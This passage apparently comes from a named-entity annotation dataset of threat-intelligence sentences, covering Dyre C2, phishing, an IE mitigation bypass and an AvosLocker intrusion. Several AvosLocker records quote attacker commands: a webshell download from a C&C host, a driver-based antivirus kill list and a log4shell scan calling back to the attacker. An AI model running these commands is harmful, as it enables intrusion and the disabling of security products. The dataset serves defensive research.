back.","entities":[{"id":45105,"label":"SOFTWARE","start_offset":71,"end_offset":74},{"id":45104,"label":"SOFTWARE","start_offset":30,"end_offset":33},{"id":45106,"label":"malware","start_offset":156,"end_offset":170},{"id":45107,"label":"SOFTWARE","start_offset":256,"end_offset":260},{"id":45108,"label":"malware","start_offset":292,"end_offset":306},{"id":45110,"label":"SOFTWARE","start_offset":312,"end_offset":315},{"id":45111,"label":"malware","start_offset":332,"end_offset":346},{"id":45103,"label":"SOFTWARE","start_offset":0,"end_offset":3},{"id":5104,"label":"tools","start_offset":352,"end_offset":355}],"relations":[{"id":250,"from_id":45111,"to_id":5104,"type":"uses"},{"id":252,"from_id":45108,"to_id":45111,"type":"related-to"},{"id":253,"from_id":45106,"to_id":45107,"type":"uses"},{"id":251,"from_id":45108,"to_id":45110,"type":"uses"}],"Comments":[]} {"id":1717,"text":" The Dyre banking Trojan has multiple C2 mechanisms, including encrypted HTTPS requests to a list of hard-coded IP addresses, a DGA generating 1,000 new domains each day as well as an I2P based plugin.","entities":[{"id":46891,"label":"malware","start_offset":5,"end_offset":24},{"id":46892,"label":"SOFTWARE","start_offset":184,"end_offset":187}],"relations":[],"Comments":[]} {"id":1718,"text":"These many C2 mechanisms make Dyre much more difficult to fully take down than a simple single (or small group) of C2s.","entities":[{"id":46893,"label":"malware","start_offset":30,"end_offset":34}],"relations":[],"Comments":[]} {"id":1719,"text":"the following IP address are known Dyre C2 servers.","entities":[{"id":45113,"label":"Infrastucture","start_offset":35,"end_offset":50}],"relations":[],"Comments":[]} {"id":1720,"text":" It’s not possible to list all of the domains generated by the DGA, which is the main advantage of this mechanism. To protect your network from the I2P communication used by both Dyre and CryptoWall 3.0, the easiest route is simply to identify I2P traffic and block it completely.","entities":[{"id":5120,"label":"malware","start_offset":189,"end_offset":199},{"id":46894,"label":"malware","start_offset":180,"end_offset":184},{"id":46895,"label":"SOFTWARE","start_offset":149,"end_offset":152},{"id":46896,"label":"SOFTWARE","start_offset":245,"end_offset":248}],"relations":[],"Comments":[]} {"id":1721,"text":"While there are certainly many legitimate reasons to use an anonymity network, many organizations should be wary of I2P (or Tor) traffic transiting their network.","entities":[{"id":46898,"label":"SOFTWARE","start_offset":116,"end_offset":119},{"id":46897,"label":"tools","start_offset":124,"end_offset":127}],"relations":[],"Comments":[]} {"id":1722,"text":"Palo Alto Networks App-ID technology can identify I2P traffic as well 51 other tunneling applications.","entities":[{"id":45115,"label":"SOFTWARE","start_offset":50,"end_offset":53},{"id":5127,"label":"identity","start_offset":0,"end_offset":18}],"relations":[],"Comments":[]} {"id":1723,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} {"id":1724,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} {"id":1725,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} {"id":1726,"text":"In recent research, Palo Alto Networks found attackers were creating fake versions of some well-known and well-trusted websites – including Adobe, DropBox, Facebook, and others- and putting malicious links to these sites into phishing emails sent to unsuspecting victims.","entities":[{"id":46901,"label":"SOFTWARE","start_offset":147,"end_offset":153},{"id":46903,"label":"identity","start_offset":20,"end_offset":38},{"id":46899,"label":"attack-pattern","start_offset":226,"end_offset":241},{"id":46900,"label":"SOFTWARE","start_offset":140,"end_offset":145},{"id":46902,"label":"SOFTWARE","start_offset":156,"end_offset":164}],"relations":[],"Comments":[]} {"id":1727,"text":" Here we explain this type of attack and what you should do.","entities":[],"relations":[],"Comments":[]} {"id":1728,"text":"What is it?","entities":[],"relations":[],"Comments":[]} {"id":1729,"text":"A method attackers use to target you using email that you might not know about.","entities":[],"relations":[],"Comments":[]} {"id":1730,"text":"Why should I care, what can it do to me?","entities":[],"relations":[],"Comments":[]} {"id":1731,"text":"Attackers can gain access to your personal and financial information.","entities":[],"relations":[],"Comments":[]} {"id":1732,"text":"They can also steal your computer’s processing power to mine for cryptocurrencies, which slows down your system.","entities":[],"relations":[],"Comments":[]} {"id":1733,"text":"How can I prevent it?","entities":[],"relations":[],"Comments":[]} {"id":1734,"text":"Avoid clicking on links that you get in email.","entities":[],"relations":[],"Comments":[]} {"id":1735,"text":"If you get an email and need to go to that website, type the address in your web browser yourself.","entities":[],"relations":[],"Comments":[]} {"id":1736,"text":"If the link is an email from someone you know, you can also contact them to find out if they meant to send it, and if it is safe to visit.","entities":[],"relations":[],"Comments":[]} {"id":1737,"text":"What causes it?","entities":[],"relations":[],"Comments":[]} {"id":1738,"text":"Attackers know that people will click on links in email.","entities":[],"relations":[],"Comments":[]} {"id":1739,"text":"Especially when you get an email from someone that looks like someone you trust.","entities":[],"relations":[],"Comments":[]} {"id":1740,"text":"How does it work?","entities":[],"relations":[],"Comments":[]} {"id":1741,"text":"Attackers send emails that appear to be from a person or company that you trust.","entities":[],"relations":[],"Comments":[]} {"id":1742,"text":"These emails contain malicious links that, when clicked on, lead you to an attacker’s page.","entities":[],"relations":[],"Comments":[]} {"id":1743,"text":"In addition to taking steps so the attacker’s page mimics a legitimate one, attackers often mirror well known security images, like the lock symbol, to convince you that you are on a secure site.","entities":[],"relations":[],"Comments":[]} {"id":1744,"text":"Once you’re on the attacker’s page, the attackers may ask you for personal information (like usernames, passwords, and bank account information) or to install software, or both.","entities":[],"relations":[],"Comments":[]} {"id":1745,"text":"In recent research, we found attackers were using fake versions of some well-known and well-trusted sites:","entities":[],"relations":[],"Comments":[]} {"id":1746,"text":"About: Threat Briefs are meant to help busy people understand real-world threats and how they can prevent them in their lives.","entities":[],"relations":[],"Comments":[]} {"id":1747,"text":"They’re put together by Palo Alto Networks Unit 42 threat research team and are meant for you to read and share with your family, friends, and coworkers so you can all be safer and get on with the business of your digital life.","entities":[{"id":46904,"label":"identity","start_offset":24,"end_offset":71}],"relations":[],"Comments":[]} {"id":1748,"text":"Got a topic you want us to write about for you, your friends, or your family?","entities":[],"relations":[],"Comments":[]} {"id":1749,"text":"Email us at u42comms@paloaltonetworks.com.","entities":[{"id":45116,"label":"EMAIL","start_offset":12,"end_offset":41}],"relations":[],"Comments":[]} {"id":1750,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} {"id":1751,"text":" Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.","entities":[],"relations":[],"Comments":[]} {"id":1752,"text":"In February, Microsoft awarded $100,000 to Yu Yang (@Tombkeeper) for reporting a new mitigation bypass technique as part of Microsoft’s Bounty Program.","entities":[{"id":45119,"label":"identity","start_offset":43,"end_offset":50},{"id":45120,"label":"identity","start_offset":52,"end_offset":63},{"id":45117,"label":"TIME","start_offset":3,"end_offset":11},{"id":45121,"label":"identity","start_offset":124,"end_offset":133},{"id":45118,"label":"identity","start_offset":13,"end_offset":22}],"relations":[],"Comments":[]} {"id":1753,"text":"Yu later demonstrated his research at CanSecWest in March.","entities":[{"id":46905,"label":"identity","start_offset":0,"end_offset":2}],"relations":[],"Comments":[]} {"id":1754,"text":"In his slides, he mentioned that a \"god mode\" of Internet Explorer could be turned on by a one byte overwrite.","entities":[{"id":46906,"label":"SOFTWARE","start_offset":49,"end_offset":66}],"relations":[],"Comments":[]} {"id":1755,"text":"However, he had to heavily redact this information due to an agreement between himself and Microsoft.","entities":[{"id":45122,"label":"identity","start_offset":91,"end_offset":100}],"relations":[],"Comments":[]} {"id":1756,"text":"After his slides were released, researchers began working to determine what the missing parts were.","entities":[],"relations":[],"Comments":[]} {"id":1757,"text":"And before long, Yuki Chen (@guhe120), a Chinese researcher, posted his answer.","entities":[{"id":46908,"label":"identity","start_offset":28,"end_offset":36},{"id":46907,"label":"identity","start_offset":17,"end_offset":26},{"id":46909,"label":"location","start_offset":41,"end_offset":48}],"relations":[{"id":254,"from_id":46907,"to_id":46908,"type":"duplicate-of"},{"id":255,"from_id":46907,"to_id":46909,"type":"located-at"},{"id":256,"from_id":46908,"to_id":46909,"type":"located-at"}],"Comments":[]} {"id":1758,"text":"Although the code was removed soon after posting, a copy was still maintained and used by Metasploit.","entities":[{"id":45123,"label":"tools","start_offset":90,"end_offset":100}],"relations":[],"Comments":[]} {"id":1759,"text":"Following this code, another researcher posted his VB script version using more advanced techniques.","entities":[],"relations":[],"Comments":[]} {"id":1760,"text":"Yu Yang then pasted his shellcode that used similar methods to run arbitrary code, showing that the method Yuki Chen used is exactly the one that won Yu the $100,000 award.","entities":[{"id":46910,"label":"identity","start_offset":0,"end_offset":7},{"id":46911,"label":"identity","start_offset":107,"end_offset":116},{"id":46912,"label":"identity","start_offset":150,"end_offset":152}],"relations":[],"Comments":[]} {"id":1761,"text":" The main idea of new exploitation technique is to alter a flag that is used to control the security setting of an ActiveX object.","entities":[],"relations":[],"Comments":[]} {"id":1762,"text":"If an attacker could modify it, then any script can be run, such as downloading and executing a PE file, without any notification or alert.","entities":[],"relations":[],"Comments":[]} {"id":1763,"text":"Further details were discussed in depth last month on Rapid7’s blog.","entities":[{"id":46913,"label":"identity","start_offset":53,"end_offset":60}],"relations":[],"Comments":[]} {"id":1764,"text":"The most interesting aspect of this method is that it could bypass all existing mitigation techniques including DEP\/ASLR\/EMET, and it also defeats some academic methods such as Control Flow Integrity (CFI).","entities":[],"relations":[],"Comments":[]} {"id":1765,"text":"So this raises another question: If there are no mitigation functions, do we have any other ways to defend against attacks similar to this?","entities":[],"relations":[],"Comments":[]} {"id":1766,"text":" The first line of defense is the IPS.","entities":[],"relations":[],"Comments":[]} {"id":1767,"text":"Although an attacker can use a variety of obfuscation techniques for HTML, we are still able to extract some features to create signatures.","entities":[],"relations":[],"Comments":[]} {"id":1768,"text":"To address such an issue, we’ve created signatures 36442, 36468, and 36469 to provide coverage for the security flag overwrite.","entities":[],"relations":[],"Comments":[]} {"id":1769,"text":"Although we are not aware of any attacks using this technique, these signatures have proven effective in our testing against code publicly available on the Internet. When we take a closer look at the three exploits in our blog post last month, we see that various exploit techniques are based on a singular condition, which is arbitrary memory access.","entities":[],"relations":[],"Comments":[]} {"id":1770,"text":"Only when attackers have the right to read\/write any address can they utilize either Flash or ActiveX methods to get code execution.","entities":[],"relations":[],"Comments":[]} {"id":1771,"text":"If we went even further, all three vulnerabilities are Use-After-Free bugs.","entities":[],"relations":[],"Comments":[]} {"id":1772,"text":"The three vulnerabilities each contain code to alter a user-controlled address, and the code can be distilled down to the following operations:","entities":[],"relations":[],"Comments":[]} {"id":1773,"text":" Here, xyz indicates a user-controlled address that contains the length of a vector object or length of an Int32Array.","entities":[],"relations":[],"Comments":[]} {"id":1774,"text":"Using these operations, attackers are able to modify the length values to create an object with an incorrect size, which will allow for read and write operations to occur in memory that is not part of the vector object.","entities":[],"relations":[],"Comments":[]} {"id":1775,"text":"The attackers can then use this object to perform further operations such as modification of security flag in ActiveX. To prevent such attacks, a better idea is to detect if an arbitrary address is accessed during execution.","entities":[],"relations":[],"Comments":[]} {"id":1776,"text":"In WildFire, we added modules for web browser scripts and third party plugins such as Flash.","entities":[{"id":45125,"label":"SOFTWARE","start_offset":3,"end_offset":11},{"id":45126,"label":"SOFTWARE","start_offset":86,"end_offset":91}],"relations":[],"Comments":[]} {"id":1777,"text":"One such module leverages the fact that the length of a vector object is always consistent with memory allocation, which means we can deduce the memory usage from the sum of the length of all allocated vectors.","entities":[],"relations":[],"Comments":[]} {"id":1778,"text":"If the calculated value does not match the real value, it indicates some of the vector objects may have been modified.","entities":[],"relations":[],"Comments":[]} {"id":1779,"text":"Using this method, we are able to provide length checking for Flash vector objects.","entities":[{"id":45127,"label":"SOFTWARE","start_offset":62,"end_offset":67}],"relations":[],"Comments":[]} {"id":1780,"text":"This module validates the accessing behavior at runtime.","entities":[],"relations":[],"Comments":[]} {"id":1781,"text":"If the length were suspicious, the detection module stops the malicious operation.","entities":[],"relations":[],"Comments":[]} {"id":1782,"text":"Through our enterprise security platform, including IPS and WildFire, we continue to innovate and prevent advanced exploitation techniques.","entities":[{"id":45128,"label":"SOFTWARE","start_offset":60,"end_offset":68}],"relations":[],"Comments":[]} {"id":1783,"text":"Leave a comment below let us know what you think.","entities":[],"relations":[],"Comments":[]} {"id":1784,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} {"id":1785,"text":" Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.","entities":[],"relations":[],"Comments":[]} {"id":1786,"text":"We found samples of AvosLocker ransomware that makes use of a legitimate driver file to disable antivirus solutions and detection evasion.","entities":[{"id":5282,"label":"malware","start_offset":20,"end_offset":30}],"relations":[],"Comments":[]} {"id":1787,"text":"While previous AvosLocker infections employ similar routines, this is the first sample we observed from the US with the capability to disable a defense solution using a legitimate Avast Anti-Rootkit Driver file (asWarPot.sys). ","entities":[{"id":5285,"label":"malware","start_offset":15,"end_offset":25},{"id":46915,"label":"FILEPATH","start_offset":212,"end_offset":224},{"id":46916,"label":"SOFTWARE","start_offset":180,"end_offset":205},{"id":46917,"label":"location","start_offset":108,"end_offset":110}],"relations":[{"id":257,"from_id":5285,"to_id":46916,"type":"targets"},{"id":258,"from_id":5285,"to_id":46917,"type":"targets"}],"Comments":[]} {"id":1788,"text":"In addition, the ransomware is also capable of scanning multiple endpoints for the Log4j vulnerability Log4shell using Nmap NSE script.","entities":[{"id":45130,"label":"vulnerability","start_offset":103,"end_offset":112},{"id":45129,"label":"tools","start_offset":119,"end_offset":127},{"id":45131,"label":"vulnerability","start_offset":83,"end_offset":88}],"relations":[],"Comments":[]} {"id":1789,"text":"Infection chain Figure 1. AvosLocker infection chain According to our analysis, the suspected entry point is via the Zoho ManageEngine ADSelfService Plus (ADSS) exploit: Figure 2.","entities":[{"id":5293,"label":"malware","start_offset":31,"end_offset":41},{"id":46920,"label":"vulnerability","start_offset":127,"end_offset":178}],"relations":[{"id":260,"from_id":5293,"to_id":46920,"type":"exploits"}],"Comments":[]} {"id":1790,"text":"The ADSS exploit abusing CVE-2021-40539 Due to the lack of network traffic details, we could not identify the exact CVE ID of the security gap the attacker used.","entities":[{"id":46921,"label":"vulnerability","start_offset":25,"end_offset":39},{"id":46922,"label":"malware","start_offset":4,"end_offset":8}],"relations":[{"id":261,"from_id":46922,"to_id":46921,"type":"exploits"}],"Comments":[]} {"id":1791,"text":"However, there are some indications that they abused the same vulnerability previously documented by Synacktiv during a pentest, CVE-2021-40539.","entities":[{"id":45132,"label":"vulnerability","start_offset":129,"end_offset":143},{"id":45133,"label":"identity","start_offset":101,"end_offset":110}],"relations":[],"Comments":[]} {"id":1792,"text":"The gap we observed was particularly similar to the creation of JSP files (test.jsp), execution of keytool.exe with “null” parameters to run a crafted Java class\/code.","entities":[{"id":46924,"label":"FILEPATH","start_offset":75,"end_offset":83},{"id":46923,"label":"FILEPATH","start_offset":99,"end_offset":110}],"relations":[],"Comments":[]} {"id":1793,"text":"Mapping the infection","entities":[],"relations":[],"Comments":[]} {"id":1794,"text":"The ADSS JAVA component (C:\\ManageEngine\\ADSelfService Plus\\jre\\bin\\java.exe) executed mshta.exe to remotely run a remotely-hosted HTML application (HTA) file from the attackers’ command and control (C&C) server.","entities":[{"id":45134,"label":"FILEPATH","start_offset":25,"end_offset":76},{"id":45135,"label":"FILEPATH","start_offset":87,"end_offset":96}],"relations":[],"Comments":[]} {"id":1795,"text":"Using Trend Micro™ Vision One™, we mapped out the processes that the infection performed to spawn the process.","entities":[{"id":46925,"label":"SOFTWARE","start_offset":6,"end_offset":30}],"relations":[],"Comments":[]} {"id":1796,"text":" Figure 3. Remotely executing an HTA file from the C&C server.","entities":[],"relations":[],"Comments":[]} {"id":1797,"text":"Screenshots taken from Trend Micro Vison One.","entities":[{"id":45136,"label":"SOFTWARE","start_offset":23,"end_offset":44}],"relations":[],"Comments":[]} {"id":1798,"text":" Figure 4. HTA file connecting to the C&C ","entities":[],"relations":[],"Comments":[]} {"id":1799,"text":"A closer look at the HTA file revealed that the mshta.exe downloads and executes the remotely hosted HTA file.","entities":[],"relations":[],"Comments":[]} {"id":1800,"text":"The HTA executed an obfuscated PowerShell script that contains a shellcode, capable of connecting back to the C&C server to execute arbitrary commands.","entities":[{"id":45137,"label":"tools","start_offset":31,"end_offset":41}],"relations":[],"Comments":[]} {"id":1801,"text":" Figure 5.","entities":[],"relations":[],"Comments":[]} {"id":1802,"text":"Obfuscated PowerShell script contains a shellcode","entities":[{"id":5314,"label":"tools","start_offset":11,"end_offset":21}],"relations":[],"Comments":[]} {"id":1803,"text":" The PowerShell process will download an ASPX webshell from the C&C server using the command < cmd.exe \/c powershell -command Invoke-WebRequest -Uri hxxp:\/\/xx.xx.xx.xx\/subshell.aspx -OutFile \/ManageEngine\/ADSelfService Plus\/webapps\/adssp\/help\/admin-guide >.","entities":[{"id":45139,"label":"SOFTWARE","start_offset":44,"end_offset":48},{"id":45140,"label":"Infrastucture","start_offset":67,"end_offset":77},{"id":45141,"label":"URL","start_offset":152,"end_offset":184},{"id":45138,"label":"tools","start_offset":8,"end_offset":18},{"id":45142,"label":"FILEPATH","start_offset":194,"end_offset":257},{"id":5318,"label":"tools","start_offset":109,"end_offset":119},{"id":5317,"label":"tools","start_offset":98,"end_offset":105}],"relations":[],"Comments":[]} {"id":1804,"text":"According to Synacktiv’s research, with this command, the downloaded ASPX webshell is downloaded from a remote IP address and saved to the directory, and still accessible to the attacker.","entities":[{"id":46927,"label":"SOFTWARE","start_offset":69,"end_offset":73},{"id":46926,"label":"identity","start_offset":13,"end_offset":22}],"relations":[],"Comments":[]} {"id":1805,"text":"The attackers gathered system information using available tools such as whoami and systeminfo, as well as PowerShell commands.","entities":[{"id":5324,"label":"tools","start_offset":83,"end_offset":93},{"id":5325,"label":"tools","start_offset":106,"end_offset":116},{"id":46929,"label":"tools","start_offset":72,"end_offset":78}],"relations":[],"Comments":[]} {"id":1806,"text":" Figure 6.","entities":[],"relations":[],"Comments":[]} {"id":1807,"text":"Gather system information The code executes on the current domain controller to gather the username information, while the query user information gathers data about user sessions on a Remote Desktop Session Host server, name of the user, session ID, state of the session (either active or disconnected), idle time, date, and time the user logged on.","entities":[],"relations":[],"Comments":[]} {"id":1808,"text":" Figure 7. Executed with the \/domain argument to collect username information Figure 8.","entities":[],"relations":[],"Comments":[]} {"id":1809,"text":"query user information for session data ","entities":[],"relations":[],"Comments":[]} {"id":1810,"text":"The PowerShell downloads, installs, and allows the remote desktop tool AnyDeskMSI through the firewall.","entities":[{"id":46930,"label":"tools","start_offset":4,"end_offset":14},{"id":46931,"label":"tools","start_offset":71,"end_offset":81}],"relations":[{"id":262,"from_id":46930,"to_id":46931,"type":"downloads"}],"Comments":[]} {"id":1811,"text":" Figure 9. The PowerShell downloading and installing AnyDeskMSI ","entities":[{"id":5340,"label":"tools","start_offset":19,"end_offset":29},{"id":46932,"label":"tools","start_offset":57,"end_offset":67}],"relations":[{"id":263,"from_id":5340,"to_id":46932,"type":"downloads"}],"Comments":[]} {"id":1812,"text":"We observed that a new user account was created, added to the current domain, and included in the administrator group.","entities":[],"relations":[],"Comments":[]} {"id":1813,"text":"This ensures the attacker can have administrative rights to the infected system.","entities":[],"relations":[],"Comments":[]} {"id":1814,"text":"The attackers also checked the running processes in the system via TaskList to check for antivirus processes running in the infiltrated system.","entities":[],"relations":[],"Comments":[]} {"id":1815,"text":" Figure 10. Creating a new account with admin rights Figure 11. Checking for antivirus processes running During the scan, we observed an attempt to terminate security products initiated via TaskKill.","entities":[],"relations":[],"Comments":[]} {"id":1816,"text":"Testing the sample with Trend Micro Vision One, the attempt failed as its sensors were still able to send activity data to the platform.","entities":[{"id":46933,"label":"SOFTWARE","start_offset":24,"end_offset":46}],"relations":[],"Comments":[]} {"id":1817,"text":" Figure 12.","entities":[],"relations":[],"Comments":[]} {"id":1818,"text":"Terminating security products running Tools and functions","entities":[],"relations":[],"Comments":[]} {"id":1819,"text":"Additional tools and components were copied to the compromised machine using AnyDeskMSI to scan the local network and disable security products.","entities":[{"id":46934,"label":"tools","start_offset":77,"end_offset":87},{"id":46936,"label":"attack-pattern","start_offset":91,"end_offset":113},{"id":46937,"label":"attack-pattern","start_offset":118,"end_offset":143}],"relations":[{"id":265,"from_id":46934,"to_id":46936,"type":"uses"},{"id":266,"from_id":46934,"to_id":46937,"type":"uses"}],"Comments":[]} {"id":1820,"text":"The tools transferred using AnyDesk are: Netscan: To scan for other endpoints Nmap (log4shell.nse): To scan for Log4shell vulnerable endpoints Hacking tools Mimikatz and Impacket: For lateral movement PDQ deploy: For mass deployment of malicious script to multiple endpoints Aswarpot.sys: For disabling defense solutions.","entities":[{"id":46938,"label":"tools","start_offset":28,"end_offset":35},{"id":46944,"label":"tools","start_offset":158,"end_offset":166},{"id":46951,"label":"attack-pattern","start_offset":294,"end_offset":321},{"id":46940,"label":"tools","start_offset":79,"end_offset":83},{"id":46942,"label":"FILEPATH","start_offset":85,"end_offset":98},{"id":46947,"label":"tools","start_offset":171,"end_offset":179},{"id":46939,"label":"tools","start_offset":42,"end_offset":49},{"id":46943,"label":"vulnerability","start_offset":113,"end_offset":122},{"id":46950,"label":"FILEPATH","start_offset":276,"end_offset":288},{"id":46948,"label":"attack-pattern","start_offset":185,"end_offset":201},{"id":46949,"label":"attack-pattern","start_offset":218,"end_offset":253},{"id":46953,"label":"tools","start_offset":202,"end_offset":212},{"id":46956,"label":"tools","start_offset":276,"end_offset":284},{"id":46955,"label":"attack-pattern","start_offset":104,"end_offset":108}],"relations":[{"id":272,"from_id":46938,"to_id":46947,"type":"downloads"},{"id":267,"from_id":46938,"to_id":46939,"type":"downloads"},{"id":268,"from_id":46938,"to_id":46940,"type":"downloads"},{"id":269,"from_id":46940,"to_id":46942,"type":"uses"},{"id":271,"from_id":46938,"to_id":46944,"type":"downloads"},{"id":273,"from_id":46938,"to_id":46953,"type":"downloads"},{"id":276,"from_id":46938,"to_id":46956,"type":"downloads"}],"Comments":[]} {"id":1821,"text":"We noted that it can disable a number of antivirus products, previously identified by Aon’s researchers.","entities":[{"id":45143,"label":"identity","start_offset":86,"end_offset":103}],"relations":[],"Comments":[]} {"id":1822,"text":" Figure 13. Copying tools and other malicious components to the compromised machine using AnyDesk ","entities":[{"id":5369,"label":"tools","start_offset":95,"end_offset":102}],"relations":[],"Comments":[]} {"id":1823,"text":"We found an Avast anti-rootkit driver installed as service 'asWarPot.sys' using the command sc.exe create aswSP_ArPot2 binPath= C:\\windows\\aswArPot.sys type= kernel.","entities":[{"id":46957,"label":"FILEPATH","start_offset":60,"end_offset":72},{"id":46958,"label":"FILEPATH","start_offset":92,"end_offset":98},{"id":46959,"label":"FILEPATH","start_offset":129,"end_offset":152},{"id":46960,"label":"SOFTWARE","start_offset":12,"end_offset":37}],"relations":[{"id":279,"from_id":46960,"to_id":46957,"type":"consists-of"}],"Comments":[]} {"id":1824,"text":"It installs the driver file in preparation for disabling the running antivirus product.","entities":[],"relations":[],"Comments":[]} {"id":1825,"text":"We noted the unusual use of cmd.exe for execution of the file.","entities":[{"id":5374,"label":"malware","start_offset":28,"end_offset":35}],"relations":[],"Comments":[]} {"id":1826,"text":" Figure 14.","entities":[],"relations":[],"Comments":[]} {"id":1827,"text":"Executing the anti-rootkit driver in the system ","entities":[],"relations":[],"Comments":[]} {"id":1828,"text":"Mimikatz components were also copied to the affected machine via AnyDeskMSI.","entities":[{"id":5378,"label":"tools","start_offset":0,"end_offset":8},{"id":46961,"label":"tools","start_offset":65,"end_offset":75}],"relations":[{"id":277,"from_id":46961,"to_id":5378,"type":"drops"}],"Comments":[]} {"id":1829,"text":"However, these components were detected and deleted.","entities":[],"relations":[],"Comments":[]} {"id":1830,"text":" Figure 15.","entities":[],"relations":[],"Comments":[]} {"id":1831,"text":"Detecting and deleting Mimikatz We observed the PowerShell script disabling the security products by leveraging aswarpot.sys (a legitimate Avast Anti-Rootkit Driver).","entities":[{"id":5382,"label":"tools","start_offset":23,"end_offset":31},{"id":5383,"label":"tools","start_offset":53,"end_offset":63},{"id":46962,"label":"SOFTWARE","start_offset":144,"end_offset":169},{"id":46963,"label":"FILEPATH","start_offset":117,"end_offset":129},{"id":46964,"label":"attack-pattern","start_offset":71,"end_offset":102}],"relations":[{"id":278,"from_id":46962,"to_id":46963,"type":"consists-of"}],"Comments":[]} {"id":1832,"text":"A list of security product processes was supplied and subsequently terminated by the driver. Figure 16.","entities":[],"relations":[],"Comments":[]} {"id":1833,"text":"Listing","entities":[],"relations":[],"Comments":[]} {"id":1834,"text":"and","entities":[],"relations":[],"Comments":[]} {"id":1835,"text":"terminating the security products found running in the compromised system ","entities":[],"relations":[],"Comments":[]} {"id":1836,"text":"Verification: Manual replication of antivirus disabling routine","entities":[],"relations":[],"Comments":[]} {"id":1837,"text":"We manually replicated the routine and commands for disabling the defense solutions to further look into the routine.","entities":[],"relations":[],"Comments":[]} {"id":1838,"text":"Figure 17 shows the list of processes that the routine searches on infection : EndpointBasecamp.exe Trend Micro Endpoint Basecamp ResponseService.exe PccNTMon.exe SupportConnector.exe AOTAgent.exe CETASvc.exe CETASvc iVPAgent.exe tmwscsvc.exe TMResponse AOTAgentSvc TMBMServer iVPAgent Trend Micro Web Service Communicator Tmccsf Tmlisten Ntrtscan TmWSCSvc Figure 17.","entities":[{"id":46965,"label":"FILEPATH","start_offset":80,"end_offset":100},{"id":46966,"label":"FILEPATH","start_offset":131,"end_offset":150},{"id":46967,"label":"FILEPATH","start_offset":151,"end_offset":163},{"id":46968,"label":"FILEPATH","start_offset":164,"end_offset":184},{"id":46972,"label":"FILEPATH","start_offset":218,"end_offset":230},{"id":46969,"label":"FILEPATH","start_offset":185,"end_offset":197},{"id":46971,"label":"FILEPATH","start_offset":198,"end_offset":209},{"id":46973,"label":"FILEPATH","start_offset":231,"end_offset":243},{"id":46974,"label":"SOFTWARE","start_offset":101,"end_offset":130},{"id":46975,"label":"SOFTWARE","start_offset":287,"end_offset":323}],"relations":[],"Comments":[]} {"id":1839,"text":"Searching for processes We found that aswArPot.sys, registered as aswSP_ArPot2 as a service, is used as the handle for the following DeviceIoControl call.","entities":[{"id":45144,"label":"FILEPATH","start_offset":42,"end_offset":54}],"relations":[],"Comments":[]} {"id":1840,"text":" Figure 18.","entities":[],"relations":[],"Comments":[]} {"id":1841,"text":"Driver file preparing to disable an antivirus product The DeviceIoControl function is used to execute parts of the driver.","entities":[],"relations":[],"Comments":[]} {"id":1842,"text":"In this case, the DeviceIoControl is inside a loop that iterates through the list of processes mentioned above.","entities":[],"relations":[],"Comments":[]} {"id":1843,"text":"Additionally, we can see that 0x9988C094 is passed to DeviceIoControl as an argument simultaneous to the ID of the current process in the iteration.","entities":[],"relations":[],"Comments":[]} {"id":1844,"text":" Figure 19.","entities":[],"relations":[],"Comments":[]} {"id":1845,"text":"DeviceIoControl as an argument with the current process ID ","entities":[],"relations":[],"Comments":[]} {"id":1846,"text":"Inside aswArPot.sys, we saw 0x9988C094 in a switch case with a function sub_14001DC80 case.","entities":[{"id":46976,"label":"FILEPATH","start_offset":7,"end_offset":19}],"relations":[],"Comments":[]} {"id":1847,"text":"Inside function sub_14001DC80, we can see that that function has the capability to terminate a given process.","entities":[],"relations":[],"Comments":[]} {"id":1848,"text":" Figure 20. 0x9988C094 in a switch case with sub_14001DC80 (above), with the latter value terminating a process (below).","entities":[],"relations":[],"Comments":[]} {"id":1849,"text":" Other executions and lateral movement","entities":[{"id":46977,"label":"attack-pattern","start_offset":25,"end_offset":41}],"relations":[],"Comments":[]} {"id":1850,"text":"After disabling the security products, the actors behind AvosLocker again tried to transfer other tools, namely Mimikatz and Impacket.","entities":[{"id":46979,"label":"tools","start_offset":112,"end_offset":120},{"id":46978,"label":"malware","start_offset":57,"end_offset":67},{"id":46980,"label":"tools","start_offset":125,"end_offset":133}],"relations":[{"id":280,"from_id":46978,"to_id":46979,"type":"downloads"},{"id":281,"from_id":46978,"to_id":46980,"type":"downloads"}],"Comments":[]} {"id":1851,"text":" Figure 21. Execution of Mimikatz (above) and Impacket via C:\\temp\\wmiexec.exe (below)","entities":[{"id":45148,"label":"tools","start_offset":50,"end_offset":58},{"id":45146,"label":"tools","start_offset":29,"end_offset":37},{"id":45147,"label":"FILEPATH","start_offset":63,"end_offset":82}],"relations":[],"Comments":[]} {"id":1852,"text":" We also observed the execution of a password recovery tool XenArmor with C:\\temp\\pass\\start.exe.","entities":[{"id":46982,"label":"tools","start_offset":63,"end_offset":71},{"id":46981,"label":"FILEPATH","start_offset":77,"end_offset":99}],"relations":[{"id":282,"from_id":46982,"to_id":46981,"type":"consists-of"}],"Comments":[]} {"id":1853,"text":" Figure 22. XenArmor password recovery tool execution ","entities":[{"id":46983,"label":"tools","start_offset":16,"end_offset":24}],"relations":[],"Comments":[]} {"id":1854,"text":"We observed the attackers using an NMAP script to check for Log4shell, the Apache Log4j remote code execution (RCE, with ID CVE-2021-44228) vulnerability across the network.","entities":[{"id":45150,"label":"vulnerability","start_offset":60,"end_offset":69},{"id":45149,"label":"tools","start_offset":35,"end_offset":39},{"id":45152,"label":"vulnerability","start_offset":75,"end_offset":109},{"id":45153,"label":"vulnerability","start_offset":124,"end_offset":138}],"relations":[],"Comments":[]} {"id":1855,"text":"They used the command nmap --script log4shell.nse --script-args log4shell.waf-bypass=true --script-args log4shell.callback-server=xx.xx.xx.xx:1389 -p 80,443 xx.xx.xx.xx\/xx, and set the callback server to the attacker group C&C server. Figure 23.","entities":[{"id":5436,"label":"tools","start_offset":22,"end_offset":26}],"relations":[],"Comments":[]} {"id":1856,"text":"Checking for log4shell We also observed more system network configuration discovery techniques being run, possibly for lateral movement as it tried looking for other available 